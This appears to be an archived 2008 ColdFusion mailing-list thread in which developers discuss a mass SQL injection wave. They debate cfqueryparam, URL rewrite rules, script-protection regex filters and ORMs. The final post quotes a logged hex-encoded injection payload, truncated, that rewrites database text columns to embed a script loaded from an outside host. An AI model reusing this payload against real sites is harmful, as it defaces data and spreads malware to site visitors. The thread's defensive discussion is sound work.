better touch some wood:-)
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Man... at this point, after reading about all of these problems with
SQL injection, and having been told that it doesn't concern MySQL, I'm glad
I'm using MySQL. This would be one big, time-consuming headache, otherwise.
I'm a solo developer and can use whatever DB I prefer, but I realize some
of you have to use the affected DB's.
I'm sure the whole thing is nothing but aggravation, to the point of wanting
to strangle (or shoot, if you're Andrew :o) (at least I think that's his
prefered
method of punishment) those abusing the DB's with attacks.
However, my day to deal with the attackers will come, I'm sure...hang in
there,
guys and gals.
Rick
> David,
>
> As a stop gap while in full force you could use the ISAPI filtering
> technique or apache rewrite. This wuold keep it from reaching CF. Of
course
> that still might mean changing for every site in your pool of sites. I
have
> a post on it... The comments are pretty useful as well:
>
>
http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevents
> -sql-injection
>
> There are about 6 or 8 posts on the topic and links to many other blogs as
> well.
>
> If that doesn't work, I have dropped a blocker script into a few dozen
> vulnerable sites - again as as stop gap. It is important to note that
these
----- Excess quoted text cut - see Original Post for more -----
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311130
Another not so common approach, is spamstop.
This little wrapper for cf, allows someone to filter the request by known
attackers. So you could redirect them away or display garbage on the screen
or whatever.
Maybe another stop gap measure.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
David,
As a stop gap while in full force you could use the ISAPI filtering
technique or apache rewrite. This wuold keep it from reaching CF. Of course
that still might mean changing for every site in your pool of sites. I have
a post on it... The comments are pretty useful as well:
http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevents
-sql-injection
There are about 6 or 8 posts on the topic and links to many other blogs as
well.
If that doesn't work, I have dropped a blocker script into a few dozen
vulnerable sites - again as as stop gap. It is important to note that these
can only be considered a temporary fix.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
I am new to the post, but I have been programming in CF for over 10 years
and know some of you from the CF Forums.
I am getting slammed with this crud as well on over 30 of my websites. Any
suggestions as how to handle this for multuple sites on 1 server? I just
discovered the issue as it seems to be targeting multiple sites on my
server.
David G. Moore, Jr.
UpstateWeb, LLC
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311129
So for six months you've known the feature is coming yet you're still
arguing about it now? Do you just like wasting people's time?
> Man your about 6 months late with that news....
>
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311126
I'm doing the request filtering in apache so that it never even
bothers my CF engine with the request, but I was wondering if Jochem
didn't like the filtering for a reason.
I wouldn't rely on it alone in any way, shape or form, but just
cutting down on the "spam" hits on the application seems like a worthy
deal.
Doing it at the network level would be even faster and less intensive
application-wise, but I'm wondering if there's a problem with the very
idea that I haven't thought of.
Accidentally removing legitimate traffic, or just trading one weakness
for another-- something like that.
We need to be preventing this stuff on every level, layered like an
onion, as someone said earlier.
I was not endorsing request filtering as a sole means of protection,
for the record. :-)
Gracias for the info on what turning on global script protection actually is!
:Den
--
He had a wonderful talent for packing thought close, and rendering it portable.
Thomas B. Macaulay
----- Excess quoted text cut - see Original Post for more -----
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311123
Man... at this point, after reading about all of these problems with
SQL injection, and having been told that it doesn't concern MySQL, I'm glad
I'm using MySQL. This would be one big, time-consuming headache, otherwise.
I'm a solo developer and can use whatever DB I prefer, but I realize some
of you have to use the affected DB's.
I'm sure the whole thing is nothing but aggravation, to the point of wanting
to strangle (or shoot, if you're Andrew :o) (at least I think that's his prefered
method of punishment) those abusing the DB's with attacks.
However, my day to deal with the attackers will come, I'm sure...hang in there,
guys and gals.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311120
----- Excess quoted text cut - see Original Post for more -----
>~Brad
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311119
David,
As a stop gap while in full force you could use the ISAPI filtering
technique or apache rewrite. This wuold keep it from reaching CF. Of course
that still might mean changing for every site in your pool of sites. I have
a post on it... The comments are pretty useful as well:
http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevents
-sql-injection
There are about 6 or 8 posts on the topic and links to many other blogs as
well.
If that doesn't work, I have dropped a blocker script into a few dozen
vulnerable sites - again as as stop gap. It is important to note that these
can only be considered a temporary fix.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
I am new to the post, but I have been programming in CF for over 10 years
and know some of you from the CF Forums.
I am getting slammed with this crud as well on over 30 of my websites. Any
suggestions as how to handle this for multuple sites on 1 server? I just
discovered the issue as it seems to be targeting multiple sites on my
server.
David G. Moore, Jr.
UpstateWeb, LLC
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311118
> I am new to the post, but I have been programming in CF for over 10 years
and know some of you from the CF Forums.
>
> I am getting slammed with this crud as well on over 30 of my websites. Any
suggestions as how to handle this for multuple sites on 1 server? I just
discovered the >issue as it seems to be targeting multiple sites on my server.
What people have done:
1. Make sure the database login that CF is using does not have access
to the system tables. This particular attack queries the schema to
find tables and fields to attack.
2. Put in place some kind of url rewrite rules to catch the threat and
deal with it at that point
3. Put in place some ColdFusion code that checks all forms of user
input for malicious code and that deals with it appropriately
4. Start the daunting task of putting cfqueryparam where it wasn't
already (daunting for those who have inherited apps with thousands of
queries, none of which used it)
A scan of this thread should get you the info on the rewrites rules
and CF code that people have put forward.
HTH
Dominic
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311117
>I can't vouch for php, .Net but at least in the Java world ORM reduces that
>risk to nil. And its built into the ORM, so if the ORM can't work out your
>polymorphic function in the database then how does it do it?
php is as ColdFusion and Java; you can use a plain query string or use
a parametised statement / prepared statement. If you use the prepared
statement, you are protected from SQL injection (unless your SQL is
running some code on the db that takes your input and runs it as
dynamic SQL, of course ;).
I think the main trouble with cfqueryparam is that it has not been
pushed enough in the documentation and in books. This is why reams of
application are not using it - the people writing the queries did not
know any different. I would say the same is true of php and prepared
statements though I have not enough experience in php to vouch for
that.
ORM is brilliant and hibernate appears to be great news for CF9.
However, I believe that ORM is an application design *choice* and not
something to be forced by the language (therefore hibernate will not
interfere with cfquery I presume. That said, I think that if CF could
make use of hibernate's data mapping knowledge to rewrite a plain
query to be a parametised one, that would be great news indeed. I
think that is what Andrew is getting at - if it could be done
efficiently and without configuration or convention that would have to
be welcome.
A question for anyone who knows hibernate then; does it require
configuration per database, rely on convention or does it query the
schema to generate its mappings automatically?
Dominic
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311115
I am new to the post, but I have been programming in CF for over 10 years and
know some of you from the CF Forums.
I am getting slammed with this crud as well on over 30 of my websites. Any
suggestions as how to handle this for multuple sites on 1 server? I just
discovered the issue as it seems to be targeting multiple sites on my server.
David G. Moore, Jr.
UpstateWeb, LLC
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311113
----- Excess quoted text cut - see Original Post for more -----
>Adobe Community Expert / Advanced Certified ColdFusion Professional
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311114
> I haven't mentioned this before because I do believe that filtering
>> request URLs is the wrong approach
>
> Care to elaborate on this?
Denstar, dig out your neo-security.xml file. In my Windows CF8 standalong
install it is located in C:\ColdFusion8\lib\neo-security.xml
Look at the following section:
<var name="CrossSiteScriptPatterns">
<struct type="coldfusion.server.ConfigMap">
<var name="<\s*(object|embed|script|applet|meta)">
<string><InvalidTag</string>
</var>
</struct>
</var>
When you check the "Enable Global Script Protection" check box on the
Settings page of ColdFusion Administartor, requests are filtered if anything
in the Form, URL, CGI, or Cookie scope matches this regex:
"<\s*(object|embed|script|applet|meta)"
What Jochem is saying, is to add to that regex to filter for whatever else
you want and enable that setting.
While I agree with Jochem that request filtering is NOT the appropriate way
to secure your application, this is a rather slick approach.
Also note, this is NOT rewriting. It is not happinging at the network
level, nor is it happening at the web server level (Aache, IIS). The
requests are filtered when they reach ColdFusion.
~Brad
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311111
Man your about 6 months late with that news....
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
You'll be happy to know that CF9 is rumoured to include Hibernate with
a corresponding set of tags, so CF should indeed be able to deal with
this under the hood.
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311110
Have you ever done any GORM work?
Now technically embedding hibernate into ColdFusion would technically be
under the hood as far as ColdFuison is concerned.
I mean, I might as well by your reasoning say that ajaxUI is not under the
hood in ColdFusion because it uses a 3rd part library to do its work.
In the advent that ColdFusion does incorporate hibernate it will technically
be under the hood, because your tags / functions call internal wrappers to
ColdFusion to do the work for you.
So technically GORM and its Domain Driven Design, is considered to be under
the hood.
Technically....
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Andrew Scott wrote:
> I stand by the fact that cfqueryparam, can and should be taken care of
under
> the hood. Other languages are doing it, so what does that tell you?
It tells me that they need additional configuration or convention.
I have 2 functions with the following signatures in my database:
find(needle:char, haystack:text):boolean
find(needle:varchar, haystack:text):boolean
I call the database in one place using:
<cfquery ...>
SELECT find(
<cfqueryparam cfsqltype="cf_sql_varchar" value="#x#" />,
<cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
)
</cfquery>
In another place I use:
<cfquery ...>
SELECT find(
<cfqueryparam cfsqltype="cf_sql_char" value="#x#" />,
<cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
)
</cfquery>
Along comes your ColdFusion version that can determine datatypes to bind
to automagically. So now I start using:
<cfquery ...>
SELECT find('x#', '#y#')
</cfquery>
But which of the two find() functions in the database is going to get
executed?
The only way to make sure a specific find() function is executed in the
database is by configuring the ORM to do so. Fine, problem solved. But
that is not under the hood.
ORMs need configuration too. That is not under the hood.
Jochem
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311109
You'll be happy to know that CF9 is rumoured to include Hibernate with
a corresponding set of tags, so CF should indeed be able to deal with
this under the hood.
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311108
Andrew Scott wrote:
> I stand by the fact that cfqueryparam, can and should be taken care of under
> the hood. Other languages are doing it, so what does that tell you?
It tells me that they need additional configuration or convention.
I have 2 functions with the following signatures in my database:
find(needle:char, haystack:text):boolean
find(needle:varchar, haystack:text):boolean
I call the database in one place using:
<cfquery ...>
SELECT find(
<cfqueryparam cfsqltype="cf_sql_varchar" value="#x#" />,
<cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
)
</cfquery>
In another place I use:
<cfquery ...>
SELECT find(
<cfqueryparam cfsqltype="cf_sql_char" value="#x#" />,
<cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
)
</cfquery>
Along comes your ColdFusion version that can determine datatypes to bind
to automagically. So now I start using:
<cfquery ...>
SELECT find('x#', '#y#')
</cfquery>
But which of the two find() functions in the database is going to get
executed?
The only way to make sure a specific find() function is executed in the
database is by configuring the ORM to do so. Fine, problem solved. But
that is not under the hood.
ORMs need configuration too. That is not under the hood.
Jochem
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311107
Actually,
That should have been the reverse on URL filtering:-( In other words, I
should or could write a filter to do the checking of SQL injections. Sorry
my bad there. But it is only one way to do it.
Anyway as I do grails work I dug this link up for you all...
http://docs.codehaus.org/display/GRAILS/Security
So it is possible to do under the hood, now I can't vouch for Transfer but I
do know Mark would have used cfqueryparam. Now as it is written in
ColdFusion in most parts, it does take care of the fact as a developer I
don't need to worry about the SQL injection as I am confident that Transfer
has taken care of it for me. That is a typical example, how ColdFusion can
and should do it under the hood.
And take particular notice how the data is escaped when committing to the
database.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
> Andrew Scott wrote:
>> Ever heard of IP spoofing? Sure you need to complain about it, but the
one
>> thing they need to do is track the packets.
>
> IP spoofing is really only a significant problem with UDP. With TCP any
> decent ISP will catch spoofs in their egress filters. Even your cheap,
> Taiwanese black box NAT router at home will stop spoofing for TCP
> because it won't be able to match the NAT state.
Unrelated, but isn't our government pretty much listening to all the
chatter across the wires? Pity to think we couldn't take advantage of
that infrastructure. </joke>
[...]
> There is no way CF can guess the right datatypes to bind my function
> arguments to when I call a polymorphic function in the database.
This, I'm curious about. Aren't there ways to use some type of
introspection?
Bah. I see your point, even if so, you end up having to understand
every type of SQL, if from a different angle. No easy java SQL parser
to throw in, I guess.
Still, there aren't *that* many DBs out there that would need to be
supported... :-)p
> I haven't mentioned this before because I do believe that filtering
> request URLs is the wrong approach
Care to elaborate on this?
Even just a couple of rules in an apache conf file has helped quite a
bit to eliminate these spam hits on CF, without impacting anthing
else, that I'm aware of... are you thinking something closer to the
network level?
Every piece you add opens holes, and I used to sorta shun rewriting
because of that, but, who am I kidding? :-) And it seems like
rewriting is pretty common-place, so pretty vetted. But I'd love to
hear your take on the URL request filtering, Jochem!
:Denny
--
Few of the many wise apothegms which have been uttered have prevented
a single foolish action.
Thomas B. Macaulay
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311106
----- Excess quoted text cut - see Original Post for more -----
Unrelated, but isn't our government pretty much listening to all the
chatter across the wires? Pity to think we couldn't take advantage of
that infrastructure. </joke>
[...]
> There is no way CF can guess the right datatypes to bind my function
> arguments to when I call a polymorphic function in the database.
This, I'm curious about. Aren't there ways to use some type of introspection?
Bah. I see your point, even if so, you end up having to understand
every type of SQL, if from a different angle. No easy java SQL parser
to throw in, I guess.
Still, there aren't *that* many DBs out there that would need to be
supported... :-)p
> I haven't mentioned this before because I do believe that filtering
> request URLs is the wrong approach
Care to elaborate on this?
Even just a couple of rules in an apache conf file has helped quite a
bit to eliminate these spam hits on CF, without impacting anthing
else, that I'm aware of... are you thinking something closer to the
network level?
Every piece you add opens holes, and I used to sorta shun rewriting
because of that, but, who am I kidding? :-) And it seems like
rewriting is pretty common-place, so pretty vetted. But I'd love to
hear your take on the URL request filtering, Jochem!
:Denny
--
Few of the many wise apothegms which have been uttered have prevented
a single foolish action.
Thomas B. Macaulay
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311105
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
And you haven't seen grails then, you can't get any more of a dyanmic
language than that:-)
It uses GORM, which is a entry point to hibernate and guess what it takes
care of eveything I spoke about.
Still no reason Coldfusion can't and I will stand by that.
Andrew Scott wrote:
> I can't vouch for php, .Net but at least in the Java world ORM reduces
that
> risk to nil. And its built into the ORM, so if the ORM can't work out your
> polymorphic function in the database then how does it do it?
With an ORM in combination with an untyped language my use case of
polymorphic functions would probably end up as a configuration issue in
the ORM and the ORM exposing multiple functions to the application.
Jochem
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311104
Hmm,
I wasn't trying to compare ColdFusion to Grails, I used grails as an example
because it relies heavily on an ORM. The ORM has the needed datatypes for
the DB (or bind / prepared Statements), but when it comes to SQL injection,
it doesn't appear to be an issue.
Please read what I said, I wasn't trying to compare apples to oranges. But
they both have the ability to be infected, it is up to how that protection
is put into place as to how much work is involved by the developer.
I stand by the fact that cfqueryparam, can and should be taken care of under
the hood. Other languages are doing it, so what does that tell you?
That way older code, can be automatically be protected under the scenes with
no change to the appliction you design. Its not rocket science, but it is
something to consider.
Hibernate has no problems with SQl injection why is that?
Because hibernate DOES use prepared statements under the hood, so if it can
there is no reason why Coldfusion can't.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Andrew Scott wrote:
> I believe IP spoofing is still a huge problem. I know little about it, so
no
> more comment on that but a quick google shows that it is still a huge
> problem.
AIDS is a huge problem too. It is also about equally relevant for the
current wave of SQL injection attacks.
> As for polymorphic functions, that is not the issue. SQL injection is
mainly
> passed via the URL, header or some form of post to the server. A filter
can
> be placed to introspect every request to check the URL for known SQL
> injection attacks.
Yes, a sufficiently advanced filter (basically an allow list of values)
can do that. But you did not claim a filter could do that, you claimed
ColdFusion could do anything cfqueryparam does under the hood. And that
is just not true. It is impossible to extrapolate the correct datatype
of input BIND variables from the text of the query string. You need code
or convention for that.
> I can't vouch for php, .Net but at least in the Java world ORM reduces
that
> risk to nil. And its built into the ORM, so if the ORM can't work out your
> polymorphic function in the database then how does it do it?
With an ORM in combination with an untyped language my use case of
polymorphic functions would probably end up as a configuration issue in
the ORM and the ORM exposing multiple functions to the application.
> This thread was about SQL injection, and a more better response would be
for
> the CFML engine to intercept every request and reject anything that looks
> remotely like a sql injection attack.
But you can do that already. Just fiddle with the allowed SQL options in
CF and observe the random failures in the application as CF tries to
interpret SQL.
Whatever the solution is, it is not teaching CF how to interpret SQL. CF
is the CFML runtime and should leave the interpretation of SQL to the
database.
> If you where in the Java, Grails world there is no such thing as
> cfqueryparam. They do it under the hood, and there is no real reason that
> Coldfusion can adopt the same.
Maybe the tags don't exist, but in Java the concepts do. In fact, the
CFML constructs map directly to Java classes:
cfquery -> java -> jdbc -> statement
cfquery + cfqyeryparam -> java -> jdbc -> preparedstatement
cfstoredproc -> java -> jdbc -> callablestatement
And I think Dave already explained to you why you shouldn't compare
Grails and ColdFusion. Now, if you wanted to compare ModelGlue Unity and
Grails, you will see that neither exposes cfqueryparam like
functionality to the programmer. (But please don't claim the concepts
aren't there, they are just hidden behind an ORM).
Jochem
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311103
>>they are back.
Yeah, here too.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311102
Andrew Scott wrote:
> I believe IP spoofing is still a huge problem. I know little about it, so no
> more comment on that but a quick google shows that it is still a huge
> problem.
AIDS is a huge problem too. It is also about equally relevant for the
current wave of SQL injection attacks.
> As for polymorphic functions, that is not the issue. SQL injection is mainly
> passed via the URL, header or some form of post to the server. A filter can
> be placed to introspect every request to check the URL for known SQL
> injection attacks.
Yes, a sufficiently advanced filter (basically an allow list of values)
can do that. But you did not claim a filter could do that, you claimed
ColdFusion could do anything cfqueryparam does under the hood. And that
is just not true. It is impossible to extrapolate the correct datatype
of input BIND variables from the text of the query string. You need code
or convention for that.
> I can't vouch for php, .Net but at least in the Java world ORM reduces that
> risk to nil. And its built into the ORM, so if the ORM can't work out your
> polymorphic function in the database then how does it do it?
With an ORM in combination with an untyped language my use case of
polymorphic functions would probably end up as a configuration issue in
the ORM and the ORM exposing multiple functions to the application.
> This thread was about SQL injection, and a more better response would be for
> the CFML engine to intercept every request and reject anything that looks
> remotely like a sql injection attack.
But you can do that already. Just fiddle with the allowed SQL options in
CF and observe the random failures in the application as CF tries to
interpret SQL.
Whatever the solution is, it is not teaching CF how to interpret SQL. CF
is the CFML runtime and should leave the interpretation of SQL to the
database.
> If you where in the Java, Grails world there is no such thing as
> cfqueryparam. They do it under the hood, and there is no real reason that
> Coldfusion can adopt the same.
Maybe the tags don't exist, but in Java the concepts do. In fact, the
CFML constructs map directly to Java classes:
cfquery -> java -> jdbc -> statement
cfquery + cfqyeryparam -> java -> jdbc -> preparedstatement
cfstoredproc -> java -> jdbc -> callablestatement
And I think Dave already explained to you why you shouldn't compare
Grails and ColdFusion. Now, if you wanted to compare ModelGlue Unity and
Grails, you will see that neither exposes cfqueryparam like
functionality to the programmer. (But please don't claim the concepts
aren't there, they are just hidden behind an ORM).
Jochem
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311101
Hmmm,
I believe IP spoofing is still a huge problem. I know little about it, so no
more comment on that but a quick google shows that it is still a huge
problem.
As for polymorphic functions, that is not the issue. SQL injection is mainly
passed via the URL, header or some form of post to the server. A filter can
be placed to introspect every request to check the URL for known SQL
injection attacks.
That would then remove the need to had extra overload for each query,
because the intail request would have already been checked. So if you where
to have a component with 20 queries, and have hits of around 1000 the cycles
to do SQL protection in the cfqueryparam would be reduce to one check and
not 20 * 1000, but 1000 only. Surely that increase in speed has to be worth
something? No?
As for what else cfqeuryparam offers, this can be handled by the cfquery
tag. After all ColdFusion has been using JDBC drivers for a long time, the
cfqueryparam was introduced in the days when ColdFusion was not built ontop
of Java. That means that the extra features that JDBC drivers introduce
(like pooling, binding etc.) can be taken care of under the hood. And with a
proper ORM, it would know what datatype you are requesting anyway.
But as I stated once before, Coldfusion 9 with hibernate native support
would elimante the SQL injection problem.
I can't vouch for php, .Net but at least in the Java world ORM reduces that
risk to nil. And its built into the ORM, so if the ORM can't work out your
polymorphic function in the database then how does it do it?
This thread was about SQL injection, and a more better response would be for
the CFML engine to intercept every request and reject anything that looks
remotely like a sql injection attack.
If you where in the Java, Grails world there is no such thing as
cfqueryparam. They do it under the hood, and there is no real reason that
Coldfusion can adopt the same.
How hard is that to understand?
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Andrew Scott wrote:
> Ever heard of IP spoofing? Sure you need to complain about it, but the one
> thing they need to do is track the packets.
IP spoofing is really only a significant problem with UDP. With TCP any
decent ISP will catch spoofs in their egress filters. Even your cheap,
Taiwanese black box NAT router at home will stop spoofing for TCP
because it won't be able to match the NAT state.
You just send your complaints to the abuse department of their ISP and
they will handle it. Or not, but that is really out of your hands.
> But yes start with your IP, give them as much info as they need to do
their
> job with. It is then in their hands to contact the authorities to have the
> individual charged.
You want to charge somebody because his computer is infected with a trojan?
> Which leaves me to something I have stated before, why the hell Coldfusion
> didn't build this under the hood to begin with I do not know. Then it
> wouldn't matter if you use cfqueryparam or not, there is nothing that this
> tag does that couldn't be done under the hood.
There is no way CF can guess the right datatypes to bind my function
arguments to when I call a polymorphic function in the database.
> I mean with all the filters that Coldfusion has from ajax to flex
> integration, one more filter for URL's would have been simple.
I haven't mentioned this before because I do believe that filtering
request URLs is the wrong approach, but I'll let you in on a little
secret: you can plug your filter regular expressions right into
neo-security.xml. No need to change anything in any application, you
just plug it in and enable the scriptprotect feature.
Jochem
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311098
Andrew Scott wrote:
> Ever heard of IP spoofing? Sure you need to complain about it, but the one
> thing they need to do is track the packets.
IP spoofing is really only a significant problem with UDP. With TCP any
decent ISP will catch spoofs in their egress filters. Even your cheap,
Taiwanese black box NAT router at home will stop spoofing for TCP
because it won't be able to match the NAT state.
You just send your complaints to the abuse department of their ISP and
they will handle it. Or not, but that is really out of your hands.
> But yes start with your IP, give them as much info as they need to do their
> job with. It is then in their hands to contact the authorities to have the
> individual charged.
You want to charge somebody because his computer is infected with a trojan?
> Which leaves me to something I have stated before, why the hell Coldfusion
> didn't build this under the hood to begin with I do not know. Then it
> wouldn't matter if you use cfqueryparam or not, there is nothing that this
> tag does that couldn't be done under the hood.
There is no way CF can guess the right datatypes to bind my function
arguments to when I call a polymorphic function in the database.
> I mean with all the filters that Coldfusion has from ajax to flex
> integration, one more filter for URL's would have been simple.
I haven't mentioned this before because I do believe that filtering
request URLs is the wrong approach, but I'll let you in on a little
secret: you can plug your filter regular expressions right into
neo-security.xml. No need to change anything in any application, you
just plug it in and enable the scriptprotect feature.
Jochem
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311097
LOL...
Ever heard of IP spoofing? Sure you need to complain about it, but the one
thing they need to do is track the packets. This will only work if all paths
along the way, have log capturing to traverse the mac address to get the
correct IP address.
But yes start with your IP, give them as much info as they need to do their
job with. It is then in their hands to contact the authorities to have the
individual charged.
I think this is one reason that there is not enough done when it comes to
DoD, and SQL Injections.
Which leaves me to something I have stated before, why the hell Coldfusion
didn't build this under the hood to begin with I do not know. Then it
wouldn't matter if you use cfqueryparam or not, there is nothing that this
tag does that couldn't be done under the hood.
However, it will not stop people from trying:-(
I mean with all the filters that Coldfusion has from ajax to flex
integration, one more filter for URL's would have been simple.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Mark Mandel wrote:
> What I'm curious about, is that there seems to be noone you can report
this to?
You can report it to the abuse department of the ISP of the originating
IP. Just look up the IP delegation and the abuse address is usually
right there.
Jochem
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311095
Mark Mandel wrote:
> What I'm curious about, is that there seems to be noone you can report this
to?
You can report it to the abuse department of the ISP of the originating
IP. Just look up the IP delegation and the abuse address is usually
right there.
Jochem
Author: mac jordan
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311092
> They completely stopped on the 11th, but they are back to day spelling it
> like "DeCLARE".
>
We're seeing the same - we're using RegExp to pick 'em up now.
--
mac jordan
www.webhorus.net | www.reactivecooking.com | www.nibblous.com |
www.jordan-cats.org
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311091
> What I'm curious about, is that there seems to be noone you can report this
to?
Well, I'm pretty sure there is something we could do, but the general
attitude seems to be to just suck it up.
And buy some stocks in the tech hardware/broadband market.
;]
--
I got 3 new servers, and a
switch!
Author: Mark Mandel
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311085
What I'm curious about, is that there seems to be noone you can report this to?
I got hammered again the other day.. this time as well through
whatever form fields they could find.
Mark
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311070
And changed
EXEC to ExEC
I am getting hit pretty hard again. It stopped for a few days but
they are back.
At 06:56 PM 8/15/2008, you wrote:
>They completely stopped on the 11th, but they are back to day spelling it
>like "DeCLARE".
>
>~Brad
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311063
They completely stopped on the 11th, but they are back to day spelling it
like "DeCLARE".
~Brad
> >>Not as far as technique, but it was much larger in scale than most
of us
> have experience before.
>
> By the way, are you still getting hits from this attack?
> I don't see any anymore.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311062
>>Not as far as technique, but it was much larger in scale than most of us
have experience before.
By the way, are you still getting hits from this attack?
I don't see any anymore.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311061
>>Going through 136+ posts seems a bit too much, many thanks.
Arn't you affraid to get even more if you start another thread again? ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311056
As an FYI: for those that did use Apache configs to stop this attack, if you
did not make sure your check was not case sensitive your being hit again.
I just saw this start coming into our logs this afternoon: Note that DECLARE
changed to DeCLARE. Some of the posts I saw for people to modify apache
where checking for DECLARE in case sensitive mode.
Cheers,
It looks like the storm is still trying to rage.
Wil Genovese
;DeCLARE%20@S%20CHAR(4000);SET%20@S
=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430
303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F
6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720
616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729
204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F
63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974
